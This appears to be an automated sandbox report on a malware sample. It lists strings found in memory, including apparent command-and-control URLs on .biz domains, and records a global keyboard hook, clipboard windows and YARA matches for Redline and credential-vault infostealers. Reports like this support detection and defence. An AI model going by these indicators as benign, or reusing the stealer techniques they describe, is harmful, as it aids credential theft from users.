Source: alg.exe, 00000007.00000003.1991584443.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1998989884.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/
Source: alg.exe, 00000007.00000003.1991584443.0000000000598000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1991735520.0000000001840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzgxMzY0ZmVj
Source: alg.exe, 00000007.00000003.2060275574.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/qbfrwab?usid=25&utid=8703404410
Source: alg.exe, 00000007.00000003.1991584443.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1998989884.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/qbfrwab?usid=25&utid=8703404410e
Source: alg.exe, 00000007.00000003.1991140646.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz:80/qbfrwab?usid=25&utid=8703404410X
Source: alg.exe, 00000007.00000003.2228650616.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.fwiwk.biz/3
Source: alg.exe, 00000007.00000003.2222455804.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.fwiwk.biz/P
Source: alg.exe, 00000007.00000003.2228650616.00000000005BC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2426939526.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2509390844.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2478183548.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2238485794.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2518175958.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2530314308.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2238967896.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2434482436.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2249290424.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2329626302.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2258038326.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2248779585.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2319948901.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2228130835.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2228650616.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2291591622.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2274221241.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2238967896.00000000005BC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2273723943.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2384400475.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.fwiwk.biz/tlrsmavbccvnwuep?usid=25&utid=8703410598
Source: alg.exe, 00000007.00000003.2228650616.00000000005BC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2238967896.00000000005BC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2249290424.00000000005BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.fwiwk.biz/tlrsmavbccvnwuep?usid=25&utid=8703410598LocationETagAuthentication-InfoAgeAccep
Source: alg.exe, 00000007.00000003.2417407058.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2399070234.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2302197410.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2368233473.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2308483180.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2426939526.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2509390844.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2478183548.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2518175958.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2530314308.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2238967896.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2434482436.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2249290424.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2329626302.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2258038326.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2319948901.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2228650616.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2291591622.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2274221241.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2222455804.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2384400475.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.fwiwk.biz/yq?usid=25&utid=8703410378
Source: alg.exe, 00000007.00000003.2222455804.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.fwiwk.biz/yq?usid=25&utid=8703410378G0aw(
Source: alg.exe, 00000007.00000003.2228650616.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.fwiwk.biz:80/tlrsmavbccvnwuep?usid=25&utid=8703410598G
Source: alg.exe, 00000007.00000003.2222455804.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.fwiwk.biz:80/yq?usid=25&utid=8703410378
Source: alg.exe, 00000007.00000003.2228130835.00000000005F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.fwiwk.biznDemandConnRouteHelper.dll.dll
Source: alg.exe, 00000007.00000003.2060275574.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.przvgke.biz/f?usid=25&utid=8703404831
Source: alg.exe, 00000007.00000003.1998500791.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.przvgke.biz:80/f?usid=25&utid=87034048319
Source: powershell.exe, 00000012.00000002.1970664669.00000000047B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: officesvcmgr.exe.7.dr	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: officesvcmgr.exe.7.dr	String found in binary or memory: http://www.openssl.org/support/faq.htmlerror
Source: alg.exe, 00000007.00000003.2178651116.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: neworigin.exe, 0000000D.00000002.3160951501.00000000030DD000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3191203054.0000000009993000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3160951501.000000000307E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3152915540.0000000001293000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3152915540.0000000001231000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3152915540.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3179935090.00000000065FC000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3160951501.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: neworigin.exe, 0000000D.00000002.3160951501.00000000030DD000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3191203054.0000000009993000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3160951501.000000000307E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3152915540.0000000001293000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3152915540.0000000001231000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3152915540.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3179935090.00000000065FC000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3160951501.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: jsc.exe, 00000005.00000002.1896308865.0000000003840000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000000.1890742051.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 00000012.00000002.1970664669.0000000004661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: jsc.exe, 00000005.00000002.1896308865.0000000003840000.00000004.00000020.00020000.00000000.sdmp, build.exe, 0000000E.00000000.1892134419.0000000000C82000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: jsc.exe, 00000005.00000002.1896308865.0000000003840000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3160951501.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000000.1890742051.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://api.ipify.org
Source: neworigin.exe, 0000000D.00000002.3160951501.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: neworigin.exe, 0000000D.00000002.3160951501.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: firefox.exe.7.dr	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: officesvcmgr.exe.7.dr	String found in binary or memory: https://clients.config.office.net/manage/v1.0/serviceabilitymanager/MsaDeviceTokenMsaLastUpdatedMsaE
Source: alg.exe, 00000007.00000003.2241048970.0000000001440000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: alg.exe, 00000007.00000003.2242907466.0000000001440000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2242633054.0000000001440000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
Source: alg.exe, 00000007.00000003.2286216627.0000000001470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io
Source: alg.exe, 00000007.00000003.2286266911.0000000001470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/schemas/annots_metadata.jsonld
Source: alg.exe, 00000007.00000003.2286266911.0000000001470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/schemas/user_comment_metadata_result_v1.json
Source: powershell.exe, 00000012.00000002.1988486571.00000000056CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000012.00000002.1988486571.00000000056CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000012.00000002.1988486571.00000000056CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: firefox.exe.7.dr	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: alg.exe, 00000007.00000003.2286725218.0000000001470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dc-api.adobe.io/discovery
Source: alg.exe, 00000007.00000003.2286725218.0000000001470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dc-api.adobe.io/discoverySoftware
Source: alg.exe, 00000007.00000003.2286725218.0000000001470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dc-api.adobe.io/schemas/discovery_v1.json
Source: alg.exe, 00000007.00000003.1990990745.0000000001480000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1991735520.0000000001840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://euob.netgreencolumn.com/sxp/i/c4601e5f6cdd73216cafdd5af209201c.js
Source: powershell.exe, 00000012.00000002.1970664669.00000000047B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: pwahelper.exe.7.dr	String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
Source: pwahelper.exe.7.dr	String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
Source: firefox.exe.7.dr	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe.7.dr	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: officesvcmgr.exe.7.dr	String found in binary or memory: https://nexusrules.officeapps.live.comhttps://nexus.officeapps.live.com/nexus/upload//nexus/rulesX-M
Source: alg.exe, 00000007.00000003.2286563075.0000000001470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://notify-stage.adobe.io/ans
Source: alg.exe, 00000007.00000003.2286563075.0000000001470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://notify-stage.adobe.io/ans/
Source: alg.exe, 00000007.00000003.2286563075.0000000001470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://notify-stage.adobe.io/anshttps://notify.adobe.io/ansEnableDesktopNotificationlocale
Source: alg.exe, 00000007.00000003.2286563075.0000000001470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://notify.adobe.io/ans
Source: alg.exe, 00000007.00000003.2286563075.0000000001470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://notify.adobe.io/ans/
Source: powershell.exe, 00000012.00000002.1988486571.00000000056CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: officesvcmgr.exe.7.dr	String found in binary or memory: https://otelrules.azureedge.net/rules/UniversaliOSFailed
Source: alg.exe, 00000007.00000003.2287165261.0000000001470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://p13n-stage.adobe.io/psdk/v2/content?
Source: alg.exe, 00000007.00000003.2287165261.0000000001470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://p13n-stage.adobe.io/psdk/v2/content?https://p13n.adobe.io/psdk/v2/content?%Y-%m-%dT%H:%M:%SZ
Source: alg.exe, 00000007.00000003.2287165261.0000000001470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://p13n.adobe.io/psdk/v2/content?
Source: alg.exe, 00000007.00000003.1990990745.0000000001480000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1991735520.0000000001840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.biz
Source: alg.exe, 00000007.00000003.1991584443.0000000000598000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1991735520.0000000001840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pcnatrk.net/track.
Source: alg.exe, 00000007.00000003.2286216627.0000000001470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://reviews.adobe.io
Source: alg.exe, 00000007.00000003.2286216627.0000000001470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://reviews.adobe.iourifullpayloadlinksinvitationURIreviewURIcommentingAssetURNEurekaInvitationI
Source: alg.exe, 00000007.00000003.2286266911.0000000001470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://scss.adobesc.com
Source: alg.exe, 00000007.00000003.2286216627.0000000001470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://scss.adobesc.comAcroCoreSyncSharedReviewLoggingEnabledAcrobat_DesktopUserhttps://comments.ad
Source: alg.exe, 00000007.00000003.2286266911.0000000001470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://scss.adobesc.cominvalidAnnotIdList
Source: alg.exe, 00000007.00000003.2286318509.0000000001470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://scss.adobesc.comreasoncom.adobe.review.sdk
Source: alg.exe, 00000007.00000003.1998853721.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1998362030.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2224754698.0000000001840000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2221804689.0000000001520000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2060275574.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2100086146.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2015258248.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2227657700.0000000001850000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1999130514.0000000001830000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2227335202.0000000001520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown

HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49730 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window created: window name: CLIPBRDWNDCLASS

Source: officesvcmgr.exe.7.dr

Binary or memory string: RegisterRawInputDevices

memstr_001d283e-d

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.jsc.exe.3879580.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 5.2.jsc.exe.3879580.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.jsc.exe.38b6790.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 13.0.neworigin.exe.ad0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 14.0.build.exe.c80000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 5.2.jsc.exe.38b6790.1.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 5.2.jsc.exe.3879580.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Source: C:\Windows\System32\alg.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\3b4327877d6689f.bin

Jump to behavior

Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7518830	0_2_00007FF6C7518830
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7522370	0_2_00007FF6C7522370
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7509340	0_2_00007FF6C7509340
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C751D16A	0_2_00007FF6C751D16A
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7518200	0_2_00007FF6C7518200
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7520C50	0_2_00007FF6C7520C50
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C750E8A0	0_2_00007FF6C750E8A0
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C74FA8B0	0_2_00007FF6C74FA8B0
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C751A850	0_2_00007FF6C751A850
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7551910	0_2_00007FF6C7551910
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C752A7B0	0_2_00007FF6C752A7B0
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7502750	0_2_00007FF6C7502750
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C75117DF	0_2_00007FF6C75117DF
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C75167F0	0_2_00007FF6C75167F0
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C751B6B0	0_2_00007FF6C751B6B0
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7513640	0_2_00007FF6C7513640
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C752E540	0_2_00007FF6C752E540
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7516610	0_2_00007FF6C7516610
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C75235C0	0_2_00007FF6C75235C0
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C75A3480	0_2_00007FF6C75A3480
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7521470	0_2_00007FF6C7521470
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7500470	0_2_00007FF6C7500470
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C752B4F0	0_2_00007FF6C752B4F0
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C75144D0	0_2_00007FF6C75144D0
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7524390	0_2_00007FF6C7524390
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7510360	0_2_00007FF6C7510360
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C751A420	0_2_00007FF6C751A420
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C74F83C4	0_2_00007FF6C74F83C4
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C752F280	0_2_00007FF6C752F280
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C75CE240	0_2_00007FF6C75CE240
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C752D320	0_2_00007FF6C752D320
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C75252E0	0_2_00007FF6C75252E0
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C752B180	0_2_00007FF6C752B180
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7531200	0_2_00007FF6C7531200
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7515200	0_2_00007FF6C7515200
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C74F8220	0_2_00007FF6C74F8220
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C751E084	0_2_00007FF6C751E084
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C75080D0	0_2_00007FF6C75080D0
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7523F60	0_2_00007FF6C7523F60
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C750FD74	0_2_00007FF6C750FD74
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C751FDD0	0_2_00007FF6C751FDD0
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7514C90	0_2_00007FF6C7514C90
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7512D30	0_2_00007FF6C7512D30
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C75B7BA0	0_2_00007FF6C75B7BA0
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C752BBA0	0_2_00007FF6C752BBA0
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C751FB40	0_2_00007FF6C751FB40
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7525C20	0_2_00007FF6C7525C20
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7516C00	0_2_00007FF6C7516C00
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C74F6A50	0_2_00007FF6C74F6A50
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7506A50	0_2_00007FF6C7506A50
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7519A50	0_2_00007FF6C7519A50
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C75B2AC0	0_2_00007FF6C75B2AC0
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 0_2_00007FF6C7501A00	0_2_00007FF6C7501A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_03157B71	5_2_03157B71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_03156EAF	5_2_03156EAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_03185980	5_2_03185980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_031939A3	5_2_031939A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_031551EE	5_2_031551EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_031900D9	5_2_031900D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_03157F80	5_2_03157F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_03183780	5_2_03183780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0318C7F0	5_2_0318C7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0318D580	5_2_0318D580
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 8_2_022B85B7	8_2_022B85B7
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 8_2_022B85C8	8_2_022B85C8
Source: C:\Windows\System32\AppVClient.exe	Code function: 12_2_00B9A810	12_2_00B9A810
Source: C:\Windows\System32\AppVClient.exe	Code function: 12_2_00B77C00	12_2_00B77C00
Source: C:\Windows\System32\AppVClient.exe	Code function: 12_2_00B779F0	12_2_00B779F0
Source: C:\Windows\System32\AppVClient.exe	Code function: 12_2_00BA2D40	12_2_00BA2D40
Source: C:\Windows\System32\AppVClient.exe	Code function: 12_2_00B9EEB0	12_2_00B9EEB0
